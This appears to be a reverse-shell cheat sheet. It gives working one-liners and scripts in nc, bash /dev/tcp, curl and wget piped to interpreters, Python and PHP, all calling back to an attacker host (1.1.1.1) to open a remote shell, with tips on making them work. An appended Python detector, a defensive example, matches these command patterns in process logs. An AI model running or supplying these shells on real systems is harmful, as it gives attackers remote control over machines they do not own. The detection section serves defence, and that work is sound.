Ways to get a reverse shell with nc:

Remote controlling host: 1.1.1.1, port 2333. Target machine: 192.168.1.1

Listen on the remote host:

nc -lvvp 2333

Reverse shell

  1. Windows version
    nc.exe -e cmd.exe 1.1.1.1 2333
  2. bash version
    bash -i >& /dev/tcp/1.1.1.1/2333 0>&1
  3. netcat version
    nc 1.1.1.1 7777 -t /bin/bash
  4. curl version
    This relies on the bash one-liner: to get a reverse shell with curl, write the one-liner into the index page of your own server, for example bash -i >& /dev/tcp/192.168.20.151/7777 0>&1, and then run curl 1.1.1.1|bash on the target host.
  5. wget version
    Similar to curl, e.g.:
    wget 1.1.1.1/shell.txt -O /tmp/x.php && php /tmp/x.php
  6. python version
    curl 1.1.1.1/shell.py | python
    #!/usr/bin/python
    #-*- coding: utf-8 -*-
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("1.1.1.1",2333)) # change localhost to your own public IP; any port works
    # point stdin, stdout and stderr at the socket
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])
  7. php version
    <?php
    $sock=fsockopen("1.1.1.1",2333);// localhost is your own public IP; any port works
    exec("/bin/sh -i <&3 >&3 2>&3");
    ?>

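Note that the PHP code has to be saved as a .txt file for the reverse shell to work; if it is saved as a .php file the connection will not succeed.
curl 1.1.1.1/shell.txt | php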
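
For the defending side, the command shapes listed above can be matched in process-execution logs (auditd, EDR command lines). This detector is an added example, not part of the original post; the rule names, the `scan` function and the sample lines are constructed for illustration.

```python
import re

# Rules mirror the command shapes listed on this page; rule names are this example's own.
_SHELL = r"(?:/bin/(?:ba)?sh\b|\bcmd(?:\.exe)?\b)"
_INTERP = r"(?:(?:ba|da|z)?sh|python[\d.]*|php)"
RULES = [
    # nc given a program to run (-e) or a shell path anywhere in its arguments
    ("nc-shell", re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*(?:\s-e\s+\S+|" + _SHELL + ")")),
    # bash's /dev/tcp/<host>/<port> pseudo-device used as a redirection target
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+")),
    # downloaded content piped straight into an interpreter
    ("pipe-to-interp", re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*" + _INTERP + r"\b")),
    # wget -O <file> followed by an interpreter run on that same file
    ("fetch-then-run", re.compile(r"\bwget\b.*\s-O\s*(\S+).*&&\s*" + _INTERP + r"\s+\1")),
]
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def scan(cmdlines):
    """Return (line_number, rule_name, first_ipv4_or_None) for each rule a line trips."""
    hits = []
    for n, line in enumerate(cmdlines, 1):
        ip = _IPV4.search(line)
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name, ip.group(0) if ip else None))
    return hits

# Constructed sample: lines 1-7 reuse the page's commands, lines 8-11 are benign controls.
SAMPLE = [
    "nc.exe -e cmd.exe 1.1.1.1 2333",
    "bash -i >& /dev/tcp/1.1.1.1/2333 0>&1",
    "nc 1.1.1.1 7777 -t /bin/bash",
    "curl 1.1.1.1 | bash",
    "wget 1.1.1.1/shell.txt -O /tmp/x.php && php /tmp/x.php",
    "curl 1.1.1.1/shell.py | python",
    "curl 1.1.1.1/shell.txt | php",
    "nc -zv 192.168.1.1 22",
    "curl -sS -o /tmp/pkg.tgz https://example.com/pkg.tgz",
    "wget https://example.com/a.txt -O /tmp/a.txt && cat /tmp/a.txt",
    "bash -i",
]

if __name__ == "__main__":
    for lineno, rule, ip in scan(SAMPLE):
        print(f"line {lineno}: {rule} (remote {ip})")
```

These are string heuristics for triage; pair them with monitoring for shell processes whose stdin and stdout are a network socket.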
